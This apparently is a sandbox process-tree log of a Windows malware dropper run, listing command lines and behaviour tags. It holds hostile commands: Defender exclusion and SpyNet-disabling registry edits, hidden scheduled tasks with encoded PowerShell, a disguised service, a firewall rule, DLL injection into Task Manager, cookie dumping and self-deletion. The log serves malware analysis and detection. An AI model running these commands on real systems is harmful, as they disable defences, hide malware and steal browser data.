C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 968
5⤵
- Program crash
PID:204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 968
5⤵
- Program crash
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 892
5⤵
- Program crash
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 884
5⤵
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1020
5⤵
- Program crash
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 888
5⤵
- Program crash
PID:896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 860
5⤵
- Program crash
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 776
5⤵
- Program crash
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1156
5⤵
- Program crash
PID:712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1088
5⤵
- Program crash
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 880
5⤵
- Program crash
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 776
5⤵
- Program crash
PID:3724

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 892
5⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1112
5⤵
PID:1760

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1284

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3124

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3620

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3940

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2248

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2760

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1352

C:\Users\Admin\Pictures\Adobe Films\5Pa6xL7OY2SJotggkqxVCL6D.exe
"C:\Users\Admin\Pictures\Adobe Films\5Pa6xL7OY2SJotggkqxVCL6D.exe"
3⤵
- Executes dropped EXE
PID:4836

C:\Users\Admin\Pictures\Adobe Films\2k0jZyWme9GDpIPjvWDInG3u.exe
"C:\Users\Admin\Pictures\Adobe Films\2k0jZyWme9GDpIPjvWDInG3u.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2584

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2056

C:\Users\Admin\Documents\9EBFUFuBH7aqapoEOxGNQGJq.exe
"C:\Users\Admin\Documents\9EBFUFuBH7aqapoEOxGNQGJq.exe"
4⤵
PID:1340

C:\Users\Admin\Pictures\Adobe Films\PwXzjWn0chonMmPzkXDeEMQM.exe
"C:\Users\Admin\Pictures\Adobe Films\PwXzjWn0chonMmPzkXDeEMQM.exe"
5⤵
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 1836
5⤵
PID:4268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 2172
5⤵
PID:5012

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3164

C:\Users\Admin\Pictures\Adobe Films\kvXZVpfZ9LIxh3osku_qtWIw.exe
"C:\Users\Admin\Pictures\Adobe Films\kvXZVpfZ9LIxh3osku_qtWIw.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im kvXZVpfZ9LIxh3osku_qtWIw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\kvXZVpfZ9LIxh3osku_qtWIw.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2492

C:\Windows\SysWOW64\taskkill.exe
taskkill /im kvXZVpfZ9LIxh3osku_qtWIw.exe /f
5⤵
- Kills process with taskkill
PID:4576

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:2640

C:\Users\Admin\Pictures\Adobe Films\swtJPkoVDerZPYqhlGPwumOz.exe
"C:\Users\Admin\Pictures\Adobe Films\swtJPkoVDerZPYqhlGPwumOz.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:3340

C:\Users\Admin\AppData\Local\Temp\eed24e0f-3d49-40a5-ac89-abd3ec3ff461.exe
"C:\Users\Admin\AppData\Local\Temp\eed24e0f-3d49-40a5-ac89-abd3ec3ff461.exe"
4⤵
- Executes dropped EXE
PID:2276

C:\Users\Admin\Pictures\Adobe Films\fHuYJ85vvIxMcwCJyqcaeeZo.exe
"C:\Users\Admin\Pictures\Adobe Films\fHuYJ85vvIxMcwCJyqcaeeZo.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\inowokmh\
4⤵
PID:1760

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\owrpncxm.exe" C:\Windows\SysWOW64\inowokmh\
4⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create inowokmh binPath= "C:\Windows\SysWOW64\inowokmh\owrpncxm.exe /d\"C:\Users\Admin\Pictures\Adobe Films\fHuYJ85vvIxMcwCJyqcaeeZo.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:3112

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description inowokmh "wifi internet conection"
4⤵
PID:4292

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start inowokmh
4⤵
PID:1656

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 660
4⤵
PID:396

C:\Users\Admin\Pictures\Adobe Films\bs9JP9UkWEMiMXNn8Ws60fL7.exe
"C:\Users\Admin\Pictures\Adobe Films\bs9JP9UkWEMiMXNn8Ws60fL7.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1544

C:\Users\Admin\Pictures\Adobe Films\J9fO8GZKZyLAaQ3kvYdX7keV.exe
"C:\Users\Admin\Pictures\Adobe Films\J9fO8GZKZyLAaQ3kvYdX7keV.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1784

C:\Users\Admin\Pictures\Adobe Films\78k5pX_tqqrrSO72nueBmlrY.exe
"C:\Users\Admin\Pictures\Adobe Films\78k5pX_tqqrrSO72nueBmlrY.exe"
3⤵
- Executes dropped EXE
PID:2476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
4⤵
PID:4804

C:\Windows\SysWOW64\timeout.exe
timeout 45
5⤵
- Delays execution with timeout.exe
PID:4960

C:\Users\Admin\Pictures\Adobe Films\RkC4INfT6KZTn6DHkfTo_WSM.exe
"C:\Users\Admin\Pictures\Adobe Films\RkC4INfT6KZTn6DHkfTo_WSM.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Users\Admin\Pictures\Adobe Films\i0HjeC3T2g2fWv95jSegoMp3.exe
"C:\Users\Admin\Pictures\Adobe Films\i0HjeC3T2g2fWv95jSegoMp3.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1148

C:\Users\Admin\Pictures\Adobe Films\bXh1QKu8V1zCYtGKLXVTIuTD.exe
"C:\Users\Admin\Pictures\Adobe Films\bXh1QKu8V1zCYtGKLXVTIuTD.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4700

C:\Users\Admin\Pictures\Adobe Films\varpFOxgffuKEQr5qL51JxW9.exe
"C:\Users\Admin\Pictures\Adobe Films\varpFOxgffuKEQr5qL51JxW9.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3328

C:\Users\Admin\AppData\Local\Temp\7zS5F20.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:500

C:\Users\Admin\AppData\Local\Temp\7zS8C4A.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:2860

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:3572

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:3056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:4740

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4188

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:3736

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:1904

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:4268

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:5040

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "guxmGyHXa" /SC once /ST 01:55:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:3964

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "guxmGyHXa"
6⤵
PID:2044

C:\Users\Admin\Pictures\Adobe Films\ZERYQhznAc32wXq6KBsRAz1a.exe
"C:\Users\Admin\Pictures\Adobe Films\ZERYQhznAc32wXq6KBsRAz1a.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 480
4⤵
PID:1432

C:\Users\Admin\Pictures\Adobe Films\XATgDymb5qZqzyRLDWsDSHhN.exe
"C:\Users\Admin\Pictures\Adobe Films\XATgDymb5qZqzyRLDWsDSHhN.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2244

C:\Users\Admin\Pictures\Adobe Films\Cv2yiwZ0DoAfFpoEBg9RejWc.exe
"C:\Users\Admin\Pictures\Adobe Films\Cv2yiwZ0DoAfFpoEBg9RejWc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4404

C:\Users\Admin\Pictures\Adobe Films\lF_BTdudT4N1fD228SRrnz8Z.exe
"C:\Users\Admin\Pictures\Adobe Films\lF_BTdudT4N1fD228SRrnz8Z.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3696

C:\Users\Admin\Pictures\Adobe Films\4CstJgsoYTy2Cc4CN12NOQ1e.exe
"C:\Users\Admin\Pictures\Adobe Films\4CstJgsoYTy2Cc4CN12NOQ1e.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3172

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 632
4⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 936
4⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 944
4⤵
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1040
4⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1056
4⤵
PID:4912

C:\Users\Admin\Pictures\Adobe Films\EDjhTb1aBZ9BG5g3zumpvALo.exe
"C:\Users\Admin\Pictures\Adobe Films\EDjhTb1aBZ9BG5g3zumpvALo.exe"
3⤵
- Executes dropped EXE
PID:2524

C:\Users\Admin\Pictures\Adobe Films\Cm7hMi4z6J7v5BvaID5_0cGP.exe
"C:\Users\Admin\Pictures\Adobe Films\Cm7hMi4z6J7v5BvaID5_0cGP.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2164

C:\Users\Admin\Pictures\Adobe Films\Cm7hMi4z6J7v5BvaID5_0cGP.exe
"C:\Users\Admin\Pictures\Adobe Films\Cm7hMi4z6J7v5BvaID5_0cGP.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4368

C:\Users\Admin\Pictures\Adobe Films\Zl24LnHuyGBD5OWSbFFM4try.exe
"C:\Users\Admin\Pictures\Adobe Films\Zl24LnHuyGBD5OWSbFFM4try.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 632
4⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 652
4⤵
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 636
4⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 1212
4⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 1284
4⤵
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 1292
4⤵
PID:4084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Zl24LnHuyGBD5OWSbFFM4try.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Zl24LnHuyGBD5OWSbFFM4try.exe" & exit
4⤵
PID:1720

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Zl24LnHuyGBD5OWSbFFM4try.exe" /f
5⤵
- Kills process with taskkill
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 1348
4⤵
PID:3432

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1708 -ip 1708
1⤵
PID:2584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1708 -ip 1708
1⤵
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1708 -ip 1708
1⤵
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1708 -ip 1708
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1708 -ip 1708
1⤵
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1708 -ip 1708
1⤵
PID:2112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1708 -ip 1708
1⤵
PID:2472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1708 -ip 1708
1⤵
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1708 -ip 1708
1⤵
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1708 -ip 1708
1⤵
PID:1304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
1⤵
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1708 -ip 1708
1⤵
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1708 -ip 1708
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1708 -ip 1708
1⤵
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1708 -ip 1708
1⤵
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
1⤵
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1708 -ip 1708
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1708 -ip 1708
1⤵
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
1⤵
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
1⤵
PID:384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2308 -ip 2308
1⤵
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2308 -ip 2308
1⤵
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2308 -ip 2308
1⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2308 -ip 2308
1⤵
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2308 -ip 2308
1⤵
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2308 -ip 2308
1⤵
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2308 -ip 2308
1⤵
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2308 -ip 2308
1⤵
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2308 -ip 2308
1⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2308 -ip 2308
1⤵
PID:3484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2308 -ip 2308
1⤵
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2308 -ip 2308
1⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2308 -ip 2308
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2308 -ip 2308
1⤵
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2308 -ip 2308
1⤵
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2308 -ip 2308
1⤵
PID:2512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1028 -ip 1028
1⤵
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1028 -ip 1028
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1028 -ip 1028
1⤵
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1028 -ip 1028
1⤵
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1028 -ip 1028
1⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1028 -ip 1028
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1028 -ip 1028
1⤵
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1028 -ip 1028
1⤵
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1028 -ip 1028
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028
1⤵
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028
1⤵
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1028 -ip 1028
1⤵
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028
1⤵
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1028 -ip 1028
1⤵
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1028 -ip 1028
1⤵
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 624
2⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1028 -ip 1028
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1028 -ip 1028
1⤵
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1028 -ip 1028
1⤵
PID:2148

C:\Windows\SysWOW64\WerFault.exe
